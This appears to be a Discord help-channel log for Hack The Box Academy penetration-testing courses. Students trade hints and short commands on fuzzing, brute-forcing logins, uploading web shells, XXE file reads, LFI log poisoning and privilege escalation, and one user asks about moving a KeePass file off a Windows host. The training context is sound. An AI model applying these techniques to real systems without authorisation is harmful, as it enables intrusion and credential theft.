xD My bad, I've messed up the name: Password Attacks, not brute-forcing attaks!

rare jackal
#

Does anyone know for file uploads part limited file uploads I'm at doing file:///flag.txt but does show empty?

lethal atlas
#

I havent done Password attacks.

#

I have done FIle Uploads however

west canopy
#

@rare jackal that should work. Maybe there is a problem with your XXE?

livid pier
rare jackal
#

Maybe..

#

Let me try agian @west canopy

sweet heron
#

Basically, I want to download a keepass file from a windows box where I have no admin privs nor internet.

lethal atlas
#

Im afraid thats not really what we do here

west canopy
#

pretty sure you need internet to download a file

sweet heron
#

I meant transfer to my host.

#

This module is nice, but frustrating at the same time. (Password Attacks)

sweet heron
#

FTR, I've found a way using base64

rare plank
#

Yo can someone help me with HTTP request plz dm if you can

west canopy
#

@rare plank i got you brah πŸ™‚

livid pier
rare jackal
#

For Skills Assessment - File Upload Attacks, can anyone share what file extension list you used? I can't seem to iterate with my list.

barren summit
#

same here, no ssh user and password provided. did you figured out what to do?

lucid mirage
#

Anyone can help me with the 1st question of FOOTPRINTING/DNS? what's the expected answer? I've tried multiple times. They're all wrong.

#

enumerate the FQDN of it for the "inlanefreight.htb" domain

feral gyro
lucid mirage
#

Thanks @feral gyro . problem solved.

glad orbit
#

Someone can help me to find the ldapadmin password and help me escalation the privilege in the "Windows Privilege Escalation Skills Assessment - Part I"?

steep sable
#

Someone here that has done the web attacks module? i could need a nudge

manic ermine
grave inlet
#

Hi, normal the targets system for ffuf module doesn't work?

#

I tried with the pwnbox and vpn, the IP:PORT doesn't seem to answer

tight mesa
#

hello everyone, I need a hint

#

I'm currently working over LFI module Server Logs/Configuration section, but I can't find the information described in the module under /etc/apache2/apache2.conf

#

anyone who had made this module before could let me know if the webroot is inside another different file as "/etc/apache2/apache2.conf"

naive ravine
#

I am currently performing the last section of the Cracking into Hack the Box, The Knowledge check exercise. I think there is something on the host that used to depend on Flash and thus some of the functionality is broken. Is there an appropriate place were I can contact support for HTB Academy related content?

maiden slate
#

@naive ravine If your in the module you should see a green circle in the bottom right corner of your screen, just contact them on there.

broken bronze
#

Can anyone help with assembly module?

storm shore
#

hello, can anyone explain to me the meaning behind key=decoded_key

#

on other parts in the program, it say serial serial=decoded_key

#

but the respective sites i am penetrating, is either serials.php or keys.php

#

how to i know which key i should use?

naive ravine
night zealot
#

Just to confirm, Can I repeat with BurpSuite modified responses from a Server? I know that requests can but I don't know if I have to modify the response and repeat it or do something in the request

barren stone
#

So, I am fairly confident with the command line, but am running through the academy (free) linux command line course, and for whatever reason, on the question "What is the index number of the "sudoers" file in the "/etc" directory?" it is not excepting my answer... My steps were: 1.) cd / 2.)cd etc 3.) ls -i | grep sudoers 4.)922354 sudoers 461 sudoers.d. Easy enough. But it is not excepting 922354 as the answer. Am I crazy, am I wrong, or are they trying to kill my machine to have me pay for it because I was beasting through the exercises since to 24 hr wait after the 1 termination.

gloomy torrent
#

Anyone done the Password Attack Module? I'm literally stuck on the first section

surreal rain
gloomy torrent
#

I was able to use cme to brute force the winrm user/pass, and from there I used evil-winrm to get powershell working, and got a list of users that are in rdp, smb. However tried brute force all password and non matched

#

that's pretty much my progress after 4 hours, no idea where to go from here lol

livid pier
maiden slate
#

@barren stoneAre you getting a line count?

flint helm
#

bruh

#

the server-side attacks skills assessement was so dumb

#

not what I had expected at all

gloomy torrent
#

nvm i found it OMEGALUL

#

spent 5 hours on the wrong path

barren stone
# maiden slate <@613695194541588500>Are you getting a line count?

As far as I know, is that it is just asking for the inode or index number of sudoers in the etc file. I thought ls -i was the command for that number, but I must be wrong. I have been working on my hacking courses since like 3am and it's 10 already, so maybe I'm misreading. Hahaha.

maiden slate
#

@barren stonelol, if I remember correctly the index number is the number assigned to it as a location in the greater whole, do you have any screenshots, DM me.

lethal atlas
maiden slate
#

If your doing a total line count for the index make sure your not also counting the first line that is just information and not the actual # of sudoers

#

@barren stone

distant stream
lethal atlas
#

did you add the domain to your /etc/hosts?

lethal atlas
drifting knoll
#

@lament crag pls be careful with spoilers

maiden slate
#

@lethal atlasah MB

lethal atlas
#

Just a heads up for anyone on Information Gathering Web Edition. In the skills assessment the question regarding gear.githubapp.com cannot be answered at this time as that site no longer exists. I have notified HTB and they are aware of the issue and will work to fix it.

sly grotto
#

hey bro did you solve this?

#

i got stuck in command injections Bypassing Other Blacklisted Characters

solid lark
#

someone could help me with the broken authentication module? im stucked at the part Predictable Reset Token

maiden slate
#

@lethal atlas NOOOOOOO! I can't finish!

#

@lethal atlas What section is that in?

lethal atlas
#

skills assessment

lethal atlas
lethal atlas
sly grotto
lethal atlas
night zealot
night zealot
lethal atlas
#

It probably has to do with aggression level of your scan.

#

try whatweb -a 3

devout cliff
#

im on the same module, info gathering web edition on section for active subdomain enumeration, when i am trying my nslookup command im getting an error: 'server cant find inlanefreight.htb:NXDOMAIN' what am i doing wrong

tight mesa
#

apologies in advanced if this is a silly question, but anyone can help me to understand how to do the last question from LFI DirTtransversal module under File Inclusion Prevention section..???

lethal atlas
lethal atlas
devout cliff
#

or something similar. let me open my VB back up

#

yeah that was it

#

nslookup -type=NS inlanefreight.htb

#

and it just threw an error back to me of 'server cant find inlanefreight.htb: NXDOMAIN'

lethal atlas
blissful verge
final salmon
#

Is the forum down? Can’t seem to load the academy modules?

west canopy
#

@final salmon Both seem to be working fine on my end

frozen lily
#

working the Active Directory LDAP - Skills Assessment and I'm literally on the last question: "What non-default privilege does the htb-student user have?" I am running whoami /priv and there are only two. Neither work. What am I missing?

west canopy
#

@frozen lily try launching an elevated powershell (as in right click -> run as administrator) , then run whoami /priv

raven cairn
#

I am having trouble with File upload attacks: Blacklist filters.

#

I was able to fuzz the availible extensions with burp, and change the filtering on the front end to upload shells. I have then tried accessing the uploaded shells.

#

I don't understand what I am doing wrong.

west canopy
#

@raven cairn DM me dawg i got you

frozen lily
weary forum
#

Hello, everyone. I am having trouble with the Web Requests Module.

#

I am supposed to send a JSON post request to /search.php. However, when I enter the command, all I get is either "empty search data" or the dreaded ">" with no input

#

I don't what I'm doing wrong, or why I get the ">"

west canopy
#

@weary forum you are missing an apostrophe at the end of your command πŸ™‚

#

'

sweet heron
#

Other than "file", is there another command/way to know how a .vhd is being encrypted? It doesn't give the info.

weary forum
sweet heron
#

Can someone give a hint on the last question of the footprining module, DNS section. Find the fqdn that ends in .203. I've tried dnsenum on all sub/sub.sub domain.

proud sparrow
#

why it says "connect: Network is unreachable"

#

im trying to use whois command on domain..

#

anyone?

lucid mirage
sweet heron
lucid mirage
sweet heron
#

I'm also stuck at the imap one in the footprinting module. The mail "inbox" is empty

lethal atlas
#

dm me for help

feral gyro
sweet heron
#

yes

feral gyro
rustic sage
#

lsexit

winged roost
#

hey all, just on the wordpress skills assessment and im stumped at the first question... am i correct in presuming that it is not as straight forward and there is a twist to find the version number?

acoustic owl
winged roost
manic ermine
#

Any more assistance with the password attacks module? I've managed to crack Winrm by pure bruteforce with the files provided. I've tried brute forcing the other services with the usernames provided also to no avail, and have spent 48 hours bruteforcing the other services with the files provided but still not cracked anything

rare jackal
#

For Login Brute Forcing section of Skill Assignment - Website. I have used hydra to brute force the admin panel and have tons of hit. However, when I enter matching usernames and passwords in the admin panel it just loops back to the admin panel login screen. Anyone have any advice?

late beacon
#

juicypotato/printspoofer not working for Windows Privilege Escalation Skills Assessment - Part I for some reason

acoustic owl
winged roost
night zealot
#

Can somebody give me a hint about Skill Assesment - Using Web Proxies? I think that I'm doing it correctly but the result is always the same

feral gyro
kindred scroll
#

I gotta say windows fundamentals course is kinda messed up. Like they taught me one thing, asked me to do another thing and even after researching it just doesn't work. Maybe I did something wrong, but the assignment also seemed to be quite vague. Just ridiculous, can't imagine windows being harder than linux at this point

#

I somehow get the wrong SID, even tho I did everything as they told me 😦

#

I can't even ask for help cuz I don't know where I got it wrong monkaS

#

Maybe if someone has the time to do this step-by-step with me. But no one does Sad_Squidward_Pepe

night zealot
kindred scroll
#

I guess it does make sense now but it should still be ordered properly, I am doing this for the first time and I don't expect rabbit holes FeelsBadMan

sweet heron
shadow mist
sweet heron
#

Hey I need help on password attacks hard lab: mounting the vhd file. dislocker gives me a cannot parse volume header error and guestmount just doesn't work

tight mesa
#

hey anyone who can give me a hint how to identify/enumerate the path transversal in the final challenge of LFI?

#

cause when I'm fuzzing to identify payloads I got a bunch of matches

lethal atlas
tight mesa
#

yes

lethal atlas
tight mesa
#

checking this out, ty

sweet heron
#

Footprinting lab medium. I'm connected as administrator via freerdp, but I can't find anything related to a htb user. I'm really lost in the sql studio as I don't know how to navigate nor what to search for.

sweet heron
feral gyro
maiden slate
#

Has anybody done the gobuster-DNS section of the 'Information Gathering - Web Edition' module? I need some help.

lethal atlas
maiden slate
#

I'll send you a screenshot, thought you might have been out to lunch.

sweet heron
late beacon
#

Hey, so I completed every module available to me on the Student plan and a few extra ones by spending the cubes I earned. Is there any other way to get cubes without buying them? And do you get some cubes as a reward if you pass the new cert?

livid pier
kindred scroll
#

Just search up those topics on YouTube. I wouldn't recommend spending money on things before you finish up all the free material

urban sage
lethal atlas
#

wow!!! a Sr. speaks.

#

we are not worthy of your presence here lol

hallow remnant
#

Requesting nudge on File Upload Skills Assessment; have directory where files are being uploaded to, but I think I'm misinterpreting how the naming convention is meant to be applied

west canopy
#

@hallow remnant DM me πŸ™‚

blissful verge
knotty hemlock
#

I'm at the password attacks module, network services, and it takes superlong using the wordlist provided, plus I get many connection issues and false positives especially for RDP. Do I miss something...?

knotty hemlock
manic ermine
livid pier
mellow whale
#

It was a labor of love @livid pier

unique valve
livid pier
unique valve
livid pier
blissful verge
#

its immense and absolutely packed with AD awesomeness, to the tune of 82,000 words πŸ™‚

livid pier
manic ermine
manic ermine
#

Anyone online able to give me some pointers on the password attacks module?

west canopy
#

@manic ermine That module scares me, i haven't started it lol

manic ermine
livid pier
#

@unique valve @mellow whale @blissful verge only 3 sections in and it already feels like this is the supreme module. The set up is amazing. The use of 'Scenario' should be used in more mods.

kind forge
#

any in FFUF module? good night

#

any finish FFUF Module?

swift cove
#

is academy broken right now? my pwnbox keeps connecting and disconnecting after a few seconds

west canopy
#

@kind forge I might be able to help, what's up?

raven cairn
#

Can I have help with SQLmap essentials bypassing web application protections, case 8?

west canopy
#

@raven cairn DM me πŸ™‚

kind forge
#

I fuzzed the parameters "user" and "username" in question 5 of the final exam of the FFUF module to obtain their values and then do the curl to bring the flag, but I can't find any differential factor
could you help me?

#

I don't know what wordlist to use anymore? could you guide me on that?

west canopy
#

yes try using names.txt , located in seclists/usernames/Names/

kind forge
#

but launch almost all of the username folder hahaha

#

i try

#

cirt-default-usernames.txt

#

mssql-usernames-nansh0u-guardicore.txt

#

sap-default-usernames.txt

#

top-usernames-shortlist.txt

west canopy
#

use names.txt

kind forge
#

what parameter bro? user or username?

west canopy
#

@kind forge DM me !

manic zealot
#

guys i need help with the web attacks, Mass IDOR Enumeration section question. the target documents.php page with any uid won't give me anything. I ran the enum script, nothing collected.

steep sable
#

@manic zealot if you intercept the traffic in burp you will see something πŸ˜‰

manic zealot
spare vault
#

negroszsd

steady forge
#

In network traffic analysis module wireshark three packet pane names how to answer this question anyone please help the format of this answer

#

Packet l___ , Packet b____ , Packet d_____.

#

I tried many format but it's shows only error

meager lynx
#

Hey, not sure where to post this. But I noticed a spelling-error. In "Introduction to Web Applications > Web Application Layout > Microservices".

resilence.PNG
#

I had to google "what the heck is re-silence"

urban sage
# blissful verge

Dangit. Another module todo. I'm still trying to catch up. πŸ˜‚

maiden slate
#

Anybody online that can help me for a sec with these questions in the Information Gathering- Web Edition section?

unknown.png
#

I keep using the methods of nslookup and dig in the module, but keep getting either dropped connections or server cannot locate errors, I'm not sure what I'm doing wrong.

lethal atlas
lethal atlas
lethal atlas
steady forge
#

I got the answers but I submit it's shows wrong in intro to network traffic Analysis on wireshark fundamentals

lethal atlas
#

ugh, I think they may have updated that module. I dont have wireshark fundamentals in my notes

lethal atlas
modest moth
#

found a slight typo in the Server Side attacks module

#

who would i send this to?

muted rampart
#

erratum

#

the group one down

modest moth
#

thanks

bold forge
#

Can I get some help? I'm doing Web Requests and on section HTTP headers. It wants me to use the dev console to find a request to a file of flag_.... But there is no request to said file.

muted rampart
#

dm me

solid lark
proper pumice
#

hey people, i stuck at "Web Attacks - Skills Assessment" trying to reset password for user, can't seem to find the way to do it right, always getting "Access denied" what i am doing wrong ? Any help greatly appreciated πŸ‘

lethal atlas
lethal atlas
bold forge
#

@lethal atlas that's okay, I think it's actually an issue I found that I need to report to support. However I am willing to take tips on note taking lol

lethal atlas
bold forge
#

@lethal atlas I shall look into cherry tree. Thanks

livid pier
jagged zenith
#

Hello guys

#

Who complete path bug bounty

sweet heron
#

Shells and payload, lab assignement 2nd host: I get an error using the exploit in msf: "NoMethodError undefined methot 'split' fo nil:NilClass"

lethal atlas
#

that means your options need checked.

sweet heron
#

maybe the URI of the arkei gate. Set to /, but did not find anything else with gobuster. I got my rhost, the creds. For some reason, there is no lhost, but i set it nonetheless.

#

Got it, it was the vhost. Why did I need to set it to the url in this situation? Rhost was not enough?

marble tinsel
#

Can someone help me with IMAP/POP3 from the Footprinting Module? somehow i am not able to enumerate the users to get the admin email :/

lethal atlas
feral gyro
marble tinsel
feral gyro
rustic sage
#

hey everyone. im having some issues with my new kali vm freezing while running zap and Burpsuite. i think it might be the amount of memory i have allotted to the the vm. how much is sufficient? i have 16gb available (i have some 32 gb sticks coming soon) i currently have 4 gb assigned to the vm

sweet heron
rustic sage
sweet heron
#

Number of processors maybe? I gave 8, so I assigned Kali 4. Also video memory which I put to max (128mb)

#

I have 8**

rustic sage
#

running much smoother.

sweet heron
#

I,m having trouble with fuzzing vhost in ffuf module. I add the target ip to my /etc/hosts (<ip> academy.htb) and I'm using this command: "ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt:FUZZ -u http://academy.htb:30863/ -H "Host: FUZZ.academy.htb" and I'm getting no results, going at 1req/sec...

west canopy
#

@sweet heron which section is that?

sweet heron
#

Filtering results

west canopy
#

Just checked my notes, your command looks right. Maybe try respawning the target?

lethal atlas
west canopy
#

Yes maybe check the wordlist , I used the same one but it was from my seclists directory

livid pier
#

1 req/sec tho

rotund gust
#

Hi, would anyone be able to give a hint on the skills assessment for SQLMap essentials? I know the page to attack but unsure on finding the parameter(s)

lethal atlas
lethal atlas
livid pier
lethal atlas
#

true

#

even for intruder 1 per second is crazy slow. I have had to add delays in intruder attacks before

sweet heron
#

either super slow or goes trough the list with errors count super high

solar zodiac
#

wow the new module on AD is incredible

#

so much content and such good content

#

thanks :D

lethal atlas
#

I know they worked hard on it

solar zodiac
#

I was blown away

#

when I read it

lethal atlas
sweet heron
#

Getting no positive hits on the parameter fuzzing in ffuf module. They say to do it against the target ip. I use the following command (nothing in /etc/host for this part right?) ffuf -w /usr/share/wordlists/burp-parameter-names.txt:FUZZ -u http://159.65.27.79:30637?FUZZ=key -fs 986 (false positive on fs 986) or should I run it against a particular page?

#

It auto added a / befgore ?, but my command don't have it

west canopy
#

@sweet heron just checked my notes and on the "Parameter Fuzzing GET" section I ran it against admin.academy.htb

#

Yea it looks like in all of the examples in the section they are running against admin.academy.htb

sweet heron
#

Yes, the scan just hangs. It looks like everytime I need to edit /etc/hosts, it doesn't work with ffuf.

#

Now my -u is http://admin.academy.htb:port?FUZZ=key with the <ip> admin.academy.htb in /etc/hosts. Same bug than vhost fuzzin.

west canopy
#

think you need to target /admin/admin.php?FUZZ=key

sweet heron
#

ok it worked. I'll try again the vhost exercise then.

#

thanks a lot btw!

west canopy
#

np πŸ™‚

sweet heron
#

Ok, so regarding my vhost fuzz problem, I needed to change everything to admin.academy.htb too. (in hosts and in -u). I tought my -u url should be the same than my -H host.

sweet heron
#

Ok now it's on value fuzzing. At the end, the curl with the newly found id just hangs. I can load the page in firefox, but can't curl to it: curl http://admin.academy.htb:32543/admin/admin.php -X POST -d 'id=XX' -H 'Content-Type: application/x-www-form-urlencoded'

#

Ok, I guess a lot of target are down in ths module, I finally resest to an ip that worked.

west canopy
#

docker shenanigans

formal sphinx
#

I am stuck on "Using Web Proxies" final section. How to have payload inside another payload in burp?

livid pier
formal sphinx
west canopy
#

@formal sphinx I just manually pre-pended the 31 character hash to every line in the wordlist . And then had it encode the entire payload

formal sphinx
livid pier
#

there is one sec

#

im opening up burp

#

payload processing

#

or how ever you need to encode it

formal sphinx
#

Here is task: "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)"

#

And here is help: "With payload processing in Burp Intruder, first add the decoded cookie as a prefix to the payload, then encode the entire payload with the same encoding methods you identified earlier (in reverse order). The final payload should be 88 characters long, similar to the one from the previous question."

#

I need to add string to another string and then encode it

#

But i can't have payload in another payload

west canopy
#

Yea i just did it manually, editing the wordlist to include the hash before each character

#

then encode the entire thing

#

I get what you're asking about a payload inside a payload, i feel like burp should be able to do it but i'm not sure how

formal sphinx
#

Yeah........

#

Thanks for help πŸ™‚

lethal atlas
#

i can tell you how to make burp do it all for you

#

@formal sphinx @west canopy if you guys wanna know I will show you in DM

tight mesa
#

hi everyone

#

who can give me a hand with this question:

In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?

from SQL Injection Fundamentals Module and SQL Operators section

#

I really would like to check if my query is right, that all

west canopy
#

@tight mesa DM me πŸ™‚

feral gyro
#

i need to if there is another way to do it

summer lake
#

Holla everybody

#

Doing "using web proxies" Proxying tools portion. I'm using kali. But when I curl proxychains curl http://IP:PORT get this $ proxychains4 curl http://134.209.23.209:30121
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
error: invalid item in proxylist section: https 127.0.0.1 8080

Anyone faced this issue too?

sweet heron
#

ffuf module, the skill assemsemnt, question 3: One of the pages you will identify should say 'You don't have access!'" I only found a couple index.php and two directories. All blank or forbidden pages. I tried the command on all 3 subdomains, my /etc/hosts is working properly for them (I have some hits), but still not the page we are looking for. Any hint? My command: "ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://<VHOST>.academy.htb:32732/FUZZ -e .xxx,.xxx,.xxx -v --recursion -recursion-depth 1 -fs 287"

west canopy
#

@sweet heron still having problems?

sweet heron
#

Yes.

west canopy
#

DM me πŸ™‚

unique latch
#

hello?

long quest
#

Hi all, I need help on HTB academy. I have connected to the academy OpenVpn but any target i spawn in the challanges its not connecting to. I cant seem to even ping the machine. I have tried from pwn box and local machine and I am having no luck. Can any one help or point me in the right direction to seek help. Thanks

opal tide
#

Hi, I have a problem with the module Windows Fundamentals. I can't connect to the machine. Not with the HTB machine and not with my own machine. I can't ping the IP either. I completed other modules before and after trying WIndows Fundamentals and it works everywhere else. Does anybody else have this problem?

unique valve
hollow knot
#

@sweet heron did you figure out how to mount the vhd from hard password attacks?

opal tide
# unique valve In what way are you trying to connect? RDP, SMB, ICMP (via ping)?

With RDP. It worked now for a minute and then the connection was gone again.

[07:45:04:721] [4315:4316] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[07:45:04:724] [4315:4316] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[07:45:04:724] [4315:4316] [INFO][com.freerdp.client.common] - Network disconnect!

unique valve
opal tide
#

it works now even without respawning. I tried the same command yesterday and couldn't connect

tiny owl
#

Plzz help

#

Hwoke u_serious

tight mesa
#

hi everyone
[6:58 PM]
who can give me a hand with this question:

In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?

from SQL Injection Fundamentals Module and SQL Operators section
[6:59 PM]
I really would like to check if my query is right, that all

blissful verge
#

hey all! I’m looking for a web-focused Training Developer to join our Academy team. If you or anyone you know may be a fit, please reach out! More about the role here: https://apply.workable.com/hack-the-box-ltd/j/ABC10ADAEB/

Training Developer (Global, Remote) - Hack The Box

Welcome! Super excited you dropped by πŸ₯³Join our mission to create and connect cyber-ready humans and organizations through highly engaging hacking experiences that cultivate out-of-the-box thinking. (Find out more insights about Hack The Box culture on...

feral gyro
ocean pier
#

Hi,
I'm starting Linux Fundamentals module. The question I'm stuck (can't get the right answer) is the following <Which kernel version is installed on the system? (Format: 1.22.3)>. I used <uname -r>, but the answer (5.10.0) was rejected by the system. I also tried <uname -v>, and that answer (5.14.0) was also rejected. What am I'm doing wrong?

feral gyro
#

and try uname -r

ocean pier
#

Thanks @feral gyro I was logged in the machine, and used <uname -r>. But the box on free account has been closed now. Can I still get the IP of the machine?

feral gyro
#

via vpn

ocean pier
#

Will the answer of my own (personal VM) be accepted in HTB Academy module? I doubt that.

lethal atlas
ocean pier
ocean pier
lethal atlas
#

You should notice that whatever IP you get in pwnbox, you will also get on your own VM when using the VPN connection.

ocean pier
lethal atlas
#

you might try sudo openvpn <Path to>/academy.ovpn

#

leave the --config off

ocean pier
lethal atlas
#

nice... Happy hacking

ocean pier
# lethal atlas nice... Happy hacking

Well, I don't even know the basics of fundamentals 😞 Far away from any hacking. Perhaps, with nice community members like you, I'll learn few things.

lethal atlas
#

You will always find help here. There are a lot of good people on here who are at various stages in their journey. The main key is to read carefully. Most every question can be answered just following the examples

ocean pier
lethal atlas
#

anyone online that can answer a question about buffer overflow in linux

west canopy
#

@lethal atlas i can try!

knotty hemlock
#

hope connections will be more stable..

marble tinsel
#

How can it be that I sometimes can't ping the Academy VM and then it works again after a while by itself? The VPN connection is established

lethal atlas
#

It seems to me that US - 2 is having issues

#

i changed to US -1 and its been much steadier

marble tinsel
lethal atlas
marble tinsel
lethal atlas
marble tinsel
#

Well thanks a lot xD

lethal atlas
#

click vpn settings then select a new region. After you will need to download a new ovpn file

#

hope that helps your connection. Like I said it seemed to fix mine

marble tinsel
#

Unfortunately it did not help :/

devout cliff
#

would anyone be willing to help me with the phishing section of the XSS module?

lethal atlas
devout cliff
#

trying to figure out how to construct this payload

#

like im finding the exploits via XSStrike that should work

#

but how to put the payloads into it is confusing me

lethal atlas
#

honestly if you just follow the examples from that section you will get thru it

devout cliff
#

i tried that last night and it seemed to just break everytime but ill try again

west canopy
#

Looking for some guidance on Stack Buffer Overflows Windowsx86, section "Controlling EIP". When i run my win32bof_exploit.py script , i am getting error: name 'payload' is not defined. I have no clue what I am doing wrong, I think my script is correct:

unknown.png unknown.png
west canopy
#

I'm losing my mind 😦

marble tinsel
#

i guess because it is in another funktion?

#

just tab it in. The indentation is not right

west canopy
#

Thank you brother , that was the problem

unknown.png
marble tinsel
#

No problem πŸ™‚

west canopy
#

I need to learn python.

marble tinsel
#

Yes these are pretty common mistakes when you program python for a while πŸ˜„

blissful verge
glad orbit
#

Help for the module: Windows Privilege Escalation Skills Assessment - Part I (Question N.2)
I solved all question but not the second question:
Find the password for the ldapadmin account somewhere on the system.
Where is this password in the system? I search with Lazagne and other string command.
Tnx

sweet heron
west canopy
#

@glad orbit DM me πŸ™‚

warm lava
#

Does anyone have any idea how to go about solving the XSS - Phishing Module? I cannot seem to figure out what they are trying to do here or how to get the URL to send to so that some mysterious credential I login with is going to let me login

west canopy
#

@warm lava I might be able to help

warm lava
#

Jared you must live on here

west canopy
#

Pretty much lol

warm lava
west canopy
#

so my notes on this section aren't super detailed but if you wanna DM me i can show you

lethal atlas
#

I think that's the one you use document.write()

#

Unfortunately I'm away from a computer all weekend

sour loom
#

what do you get from silver htb academy ?

lethal atlas
#

A monthly allotment of cubes

sour loom
#

there is no way for me to have accees to every pentesting windows related course in one month ?

lethal atlas
#

Sure, if you can complete the modules fast enough

sour loom
#

becasue i paid silver and i only have 240 cubes

lethal atlas
#

As you complete a module you get some cubes back

sour loom
#

it says i'm enrolled to Active Directory Enumeration

#

ah ok

#

but when i open it i have to pay 1000 cubes

lethal atlas
#

That's tier 3?

#

There are so many modules in the lower tiers to do.

#

I recommend the bug bounty hunter path

sour loom
#

this path is not good for me

lethal atlas
#

Ok.

sour loom
#

i wanted to do Active Directory Enumeration

lethal atlas
#

Then you will have to buy cubes

sour loom
#

I just need to skill up on active directory and windows

#

ok

#

thanks

lethal atlas
#

Yw

sweet heron
#

File inclusion module, server log poisoning question. Once I poison my user-agent, I can't get back the server to show the access.log nor doing RCE.

lyric inlet
#

Hello

#

Thanks for the new AD module

#

very fun

ocean pier
#

Hello everyone,
I just started yesterday with HTBA. My first attempts were using only Workstation instances, which has a limited time per day. Thanks to @lethal atlas and @feral gyro , I setup OpenVPN, and now I can connect from my Distro to HTBA using ssh (VM?). Since this also has limit per session (1 hr), where can I quickly get the new IP address to connect? From Dashboard or any other place/link?

jagged summit
jagged summit
misty remnant
#

need some help with information gathering, would be great if i can dm somebody

acoustic owl
flint helm
#

Hey I'm stuck at broken authentication login bruteforcing, none of these have worked.

unknown.png
west canopy
#

@flint helm Try filtering the wordlist for passwords that are all upper case with a number at the end, i.e. PASSWORD2

flint helm
#

aaah, I didn't test without lowercase braindamage

flint helm
raven cairn
#

Stupid question. On broken authentication -- default credentials.

#

I am trying to find the default credentials for a login. The website title is Webaccess HMI/SCADA Software

#

I've checked https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv and https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv but I haven't been able to find the default credentials.

GitHub
SecLists/default-passwords.csv at master Β· danielmiessler/SecLists

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, pas...

GitHub
SCADAPASS/scadapass.csv at master Β· scadastrangelove/SCADAPASS

SCADA StrangeLove Default/Hardcoded Passwords List - SCADAPASS/scadapass.csv at master Β· scadastrangelove/SCADAPASS

raven cairn
#

I've looked for a while lol. Don't know why I can't find it.

livid pier
raven cairn
#

I did. Will I find the user and password in the picture?

livid pier
#

Oh i may have misread, you are saying you tried these and they didnt work?

raven cairn
#

I tried admin:blank

raven cairn
livid pier
raven cairn
#

Got it πŸ‘

knotty hemlock
#

I ran a brute force attack on SSH with hydra for the last couple of hours, and then finally I noticed that the host is not even reachable anymore because spawn time was over 😩 Is there a way to detect this? I wasted hours bruteforcing a target that was not even up πŸ™ˆ
This is from the Password Attacks module... with the provided lists and 16 threads it takes more than 2 hours, but the machine only spawns for 70 minutes...

livid pier
#

I cut the password list in half

#

did one half one session

#

second half the other

knotty hemlock
#

i see... but it still means, you can never be sure that you didn't miss the correct credentials because of some connection error, right? ☹️ did you set the threaads to -t 4 as recommended by hydra, or did you leave it at default?

livid pier
#

i did -t 4

knotty hemlock
#

thx, I left it at 16 because then it was really fast. but i guess it doesnt work that way πŸ₯² new try...

raven cairn
knotty hemlock
raven cairn
#

You also brute force SSH in that module.

knotty hemlock
#

i feel the "password attacks" module could use some hints. It's a bit pointless to provide wordlists with 20000 combinations if time runs out after 60 minutes 😩 or maybe i'm missing something.

sweet heron
#

Hey friends! I was not able yesterday to reproduce the server log poisoning in the LFI module. Any one can check my inputs? πŸ™‚

#

I'm also here to help with plenty of modules.

rough radish
#

Hi guys, (first post)
I am in the Linux priv esc module and I cannot get past task one.
i cannot seem to run this line,
gcc kernel_expoit.c -o kernel_expoit && chmod +x kernel_expoit
there is no file that ends with ".c" after downloading the kernel exploit
forgive the question if i am being bone headed

raven cairn
rough radish
#

Kernel Exploits

raven cairn
#

Copy and paste the code into a file, and name it with .c

#

That should work.

#

That is what I did.

rough radish
#

Ooooohhhhhh.... noted

rough radish
raven cairn
#

compile, change permissions, and run. You should get Root.

rough radish
#

i will try now. thank you so much

#

Question. why can i not just rename the file and add ".c" to the end?

ocean pier